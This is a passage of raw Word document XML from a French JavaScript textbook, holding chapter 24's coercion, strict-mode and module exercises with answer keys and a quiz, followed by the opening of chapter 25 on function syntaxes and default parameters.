        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le langage est installé. Le chapitre suivant en explore les briques fondamentales : fonctions, tableaux et objets.</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24.1 — Prédire des conversions</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Donnez le résultat de chaque expression, puis vérifiez dans la console.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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"10" + 5</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"10" - 5</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Number("3.5px")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Boolean([])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:pos="425" w:val="left"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="60" w:line="348" w:lineRule="exact"/>
        <w:ind w:left="425" w:hanging="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>5.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[] + {}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 24.2 — Corriger un script global</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Ce script pollue l'espace global et échoue silencieusement.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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>nom = "Ada"; function init(){ titre = nom; }</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>var total = 0; for (var i=0;i&lt;3;i++){ total += i; }</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>if (total == "3") { init(); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 24.3 — Créer un module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Séparez le calcul et l'affichage dans deux modules.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Exportez une fonction de calcul.</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Importez-la dans le module principal.</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dans la console.</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24.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"105"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> privilégie la concaténation dès qu'une chaîne est présente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : la soustraction force la conversion numérique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> exige une chaîne entièrement numérique ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>parseFloat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> aurait renvoyé 3.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : un tableau, même vide, est un objet donc vrai. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Boolean([])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est un piège classique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"[object Object]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : les deux opérandes sont convertis en chaînes puis concaténés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 24.2</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"use strict";</w:t>
        <w:br/>
        <w:br/>
        <w:t>const nom = "Ada";</w:t>
        <w:br/>
        <w:t>let total = 0;</w:t>
        <w:br/>
        <w:t>for (let i = 0; i &lt; 3; i += 1) total += i;</w:t>
        <w:br/>
        <w:br/>
        <w:t>function init() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const titre = nom;      // variable locale</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return titre;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>if (total === 3) init();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>En mode strict, l'affectation à une variable non déclarée lève une erreur : le bogue devient visible immédiatement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>let i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> limite la portée de la boucle, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>===</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite la conversion de chaîne en nombre.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 24.3</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js/calcul.js</w:t>
        <w:br/>
        <w:t>export function moyenne(notes) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!notes.length) return 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return notes.reduce((a, b) =&gt; a + b, 0) / notes.length;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>// js/app.js</w:t>
        <w:br/>
        <w:t>import { moyenne } from "./calcul.js";</w:t>
        <w:br/>
        <w:t>console.log(moyenne([12, 15, 9]));   // 12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le module de calcul ne dépend d'aucun élément de la page : il est testable isolément.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'import doit comporter l'extension </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dans le navigateur, contrairement à certains outils de construction.</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Quelle écriture charge un script sans bloquer l'analyse du document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&lt;script src="app.js"&gt;</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&lt;script defer src="app.js"&gt;</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&lt;script src="app.js" blocking&gt;</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&lt;script nowait&gt;</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 xml:space="preserve">Que signifie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>const</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La valeur est immuable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La liaison ne peut pas être réaffectée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L'objet est gelé</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La variable est globale</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Quel opérateur évite les conversions implicites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 xml:space="preserve">Que renvoie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Boolean([])</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false</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true</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undefined</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Une erreur</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Quel est l'intérêt d'un module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Il s'exécute plus vite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Il isole la portée et structure les dépendances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Il remplace le HTML</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Il évite le CSS</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> télécharge en parallèle et exécute après l'analyse, dans l'ordre de déclaration.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche la réaffectation de la liaison ; l'objet référencé reste modifiable (sauf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Object.freeze</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>).</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L'égalité stricte compare sans convertir les types.</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Un tableau vide est un objet, donc vrai en contexte booléen — un piège classique.</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Chaque module a sa portée et déclare ses exports, ce qui évite les collisions de variables globales.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>25. Fonctions, tableaux et objets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Les trois structures qui composent tout programme JavaScript, et les méthodes qui évitent les boucles inutiles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 24</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Écrire des fonctions claires, avec paramètres par défaut.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Maîtriser les méthodes de tableau qui transforment des données.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Structurer des objets et utiliser la déstructuration.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Comprendre </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>this</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et les différences entre fonction et flèche.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Éviter les mutations involontaires.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>25.1 Fonctions : déclaration, expression, flèche</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une fonction regroupe des instructions, reçoit des paramètres et renvoie une valeur. Trois syntaxes coexistent ; elles ne diffèrent pas seulement par l'apparence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois syntaxes de fonction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Déclaration : hissée, utilisable avant sa définition</w:t>
        <w:br/>
        <w:t>function additionner(a, b) { return a + b; }</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Expression : affectée à une variable</w:t>
        <w:br/>
        <w:t>const multiplier = function (a, b) { return a * b; };</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Flèche : syntaxe concise, pas de `this` propre</w:t>
        <w:br/>
        <w:t>const diviser = (a, b) =&gt; a / b;</w:t>
        <w:br/>
        <w:t>const carre = x =&gt; x * x;</w:t>
        <w:br/>
        <w:t>const creer = () =&gt; ({ actif: true });   // parenthèses obligatoires pour un</w:t>
        <w:br/>
        <w:t xml:space="preserve">  objet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.79 — Trois formes de fonction et leurs différences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208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Forme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2358"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F2E4C"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>this</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Hissage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="277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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Déclaration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2358"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dynamique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>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2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fonctions principales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>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Expression</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="235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Dynamique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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277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Callbacks nommés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Flèche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2358"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Celui du parent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1803"/>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2774"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Callbacks courts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Paramètres par défaut et chaînage de méthodes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function normaliser(texte, separateur = "-", bas = true) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const t = texte.trim().replace(/\s+/g, separateur);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return bas ? t.toLowerCase() : t;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>normaliser("  Bonjour le Monde  ");          // "bonjour-le-monde"</w:t>
        <w:br/>
        <w:t>normaliser("Salut", "_", false);             // "Salut"</w:t>
        <w:br/>
        <w:t>normaliser("Test", undefined, true);         // "test"</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FONCTION PURE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Fonction dont le résultat ne dépend que de ses paramètres, sans effet de bord. Elle est plus facile à tester et à raisonner.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>25.2 Tableaux : transformer plutôt que boucler</w:t>
